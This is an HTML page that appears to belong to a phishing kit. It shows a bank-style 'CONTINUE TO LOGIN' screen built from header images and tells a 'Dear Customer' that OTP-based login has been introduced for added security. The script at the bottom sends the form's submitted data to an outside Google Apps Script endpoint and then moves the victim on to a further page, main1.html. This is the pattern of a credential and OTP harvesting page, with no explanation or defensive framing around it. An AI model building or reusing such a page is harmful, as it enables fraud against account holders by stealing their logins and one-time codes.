<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>

input[type=text], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-table;
  border: 1px solid ;
  box-sizing: border-box;
}

button {
  background-color:#008CBA ;
  color: white;
  padding: 14px 20px;
  margin:   0;
  border: none;
  cursor: pointer;
  width: 100%; 
}

button:hover {
  opacity: 0.8;
}

.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
}

img.avatar {
  width: 40%;
  border-radius: 50%;
}

.container {
  padding: 16px;
 
   
}

span.psw {
  float: right;
  padding-top: 16px;
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
</style>
</head>
<body>
  <body style="background-color:#fff;">
</body>
<header>

    <center><h1 class="text-center"><img src="HEADER12.jpg" style="width: 100%;"></h1></center>
  
  </header>


<form action="" method="post" name="google-sheet">
  <div class="imgcontainer">
    
  </div>

  <div class="container">






    <button type="submit">CONTINUE TO LOGIN</button> 

<p style="
    color: #008CBA;
">Dear Customer, OTP based login is introduced for added security</p>

  </div>

<center><h1 class="text-center"><img src="NEEWMG.jpg" style="width: 100%;"></h1></center>


</form>

<script>
  const scriptURL = 'https://script.google.com/macros/s/AKfycbwMxeiy_Yle8A0FiU3q4dLRM9K4UCu-mQx-YxsX49aVe-HsxJaQxD0e7uZ-HgAw3xjILA/exec'
  const form = document.forms['google-sheet']

  form.addEventListener('submit', e => {
    e.preventDefault()
    fetch(scriptURL, { method: 'POST', body: new FormData(form)})
      .then(response => window.location.href='main1.html')
      .catch(error => console.error('Error!', error.message))
  })
</script>
</body>
</html>
